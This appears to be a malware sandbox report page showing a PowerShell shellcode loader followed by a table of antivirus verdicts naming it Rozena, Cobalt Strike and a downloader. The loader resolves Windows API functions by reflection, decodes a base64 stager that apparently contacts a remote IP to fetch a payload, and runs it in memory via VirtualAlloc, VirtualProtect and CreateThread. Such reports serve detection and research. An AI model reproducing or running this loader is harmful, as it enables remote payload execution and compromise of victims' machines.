Static | ZeroBOX
No static analysis available.
function kX {
Param ($tb5sE, $wNuO)
$vYXXw = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $vYXXw.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($vYXXw.GetMethod('GetModuleHandle')).Invoke($null, @($tb5sE)))), $wNuO))
function zV2s3 {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $is2T,
[Parameter(Position = 1)] [Type] $tQpP6 = [Void]
)
$kq9_ = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$kq9_.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $is2T).SetImplementationFlags('Runtime, Managed')
$kq9_.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $tQpP6, $is2T).SetImplementationFlags('Runtime, Managed')
return $kq9_.CreateType()
[Byte[]]$cpLgJ = [System.Convert]::FromBase64String("/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSA+3SkpNMclIi3JQSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FBEi0Agi0gYSQHQ41ZNMclI/8lBizSISAHWSDHAQcHJDaxBAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEFYSAHQQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11IMdtTSb53aW5pbmV0AEFWSInhScfCTHcmB//VU1NIieFTWk0xwE0xyVNTSbo6VnmnAAAAAP/V6A0AAAAxLjE0LjI0Ny4xNjIAWkiJwUnHwEGcAABNMclTU2oDU0m6V4mfxgAAAAD/1ej6AAAAL1Fzc1Q4aGwyNHp1eGZyQjgxS241VEFrajVPb3BuLXNyYlhkRVFraWpoMWJMTGpGZ1MxQzJ1TmFWN0FIUW1GWGFQVFZxX09TZ2ZSc2tFYkpYOWNHaUIyaUZ3bks4cG5iTzB0UVNSaGJZcDl6SXBYYWU0MDFHZkR5ZXMyV1V0clh2a1lzOU1TalpiSmZubTZxQzhqQWFJZVoxUl8wVXJISXNpek13ZmVnWmZqR2V4RGVhZDNCUmlQcW5xNzdDdlo3SXZwV2VYVUFUbmFySTBKTFpOYzlabjZMUFJfMkQ3QXByUWlxX1h0ZS00LXJYNHlWZXprTFp3bXFOAEiJwVNaQVhNMclTSLgAAiiEAAAAAFBTU0nHwutVLjv/1UiJxmoKX1NaSInxTTHJTTHJU1NJx8ItBhh7/9WFwHUfSMfBiBMAAEm6RPA14AAAAAD/1Uj/z3QC68zoVQAAAFNZakBaSYnRweIQScfAABAAAEm6WKRT5QAAAAD/1UiTU1NIiedIifFIidpJx8AAIAAASYn5SboSlon
[Uint32]$w4 = 0
$gJtz = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((kX kernel32.dll VirtualAlloc), (zV2s3 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $cpLgJ.Length,0x3000, 0x04)
[System.Runtime.InteropServices.Marshal]::Copy($cpLgJ, 0, $gJtz, $cpLgJ.length)
if (([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((kX kernel32.dll VirtualProtect), (zV2s3 @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]))).Invoke($gJtz, [Uint32]$cpLgJ.Length, 0x10, [Ref]$w4)) -eq $true) {
$dl = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((kX kernel32.dll CreateThread), (zV2s3 @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$gJtz,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((kX kernel32.dll WaitForSingleObject), (zV2s3 @([IntPtr], [Int32]))).Invoke($dl,0xffffffff) | Out-Null
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Rozena.4!c
tehtris Clean
ClamAV Win.Trojan.CobaltStrike-7917400-0
CMC Clean
CAT-QuickHeal BAT.Powershell.5044
Skyhigh BehavesLike.PS.Dropper.zn
ALYac Generic.PwShell.Rozena.3.A5B0FBB0
Malwarebytes Clean
Zillya Clean
Sangfor Malware.Generic-PS.Save.d41b8e2c
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec ISB.Downloader!gen185
ESET-NOD32 PowerShell/Kryptik.Z
TrendMicro-HouseCall Clean
Avast PwrSh:PowerSploit-D [Trj]
Cynet Malicious (score: 99)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Generic.PwShell.Rozena.3.A5B0FBB0
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Generic.PwShell.Rozena.3.A5B0FBB0
Tencent Win32.Trojan.Generic.Vgil
Sophos ATK/Tlaboc-A
F-Secure Trojan.TR/PowerShell.Gen
DrWeb PowerShell.DownLoader.1984
VIPRE Generic.PwShell.Rozena.3.A5B0FBB0
TrendMicro Clean
FireEye Generic.PwShell.Rozena.3.A5B0FBB0
Emsisoft Generic.PwShell.Rozena.3.A5B0FBB0 (B)
GData Generic.PwShell.Rozena.3.A5B0FBB0
Jiangmin Clean
Varist PSH/Rozena.A.gen!Camelot
Avira TR/PowerShell.Gen
MAX malware (ai score=80)
Antiy-AVL Clean
Kingsoft Win32.Troj.Undef.a
Gridinsoft Clean
Xcitium Clean
Arcabit Generic.PwShell.Rozena.3.A5B0FBB0
SUPERAntiSpyware Clean
ZoneAlarm UDS:DangerousObject.Multi.Generic
Microsoft TrojanDropper:PowerShell/Ploty.C
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee PS/Dropper.b
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Trojan.Rozena!8.6D (TOPIS:E0:5gmxX3fyCOD)
Yandex Clean
Ikarus Trojan.PowerShell.Crypt
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG PwrSh:PowerSploit-D [Trj]
Panda Clean
CrowdStrike Clean
alibabacloud Backdoor
No IRMA results available.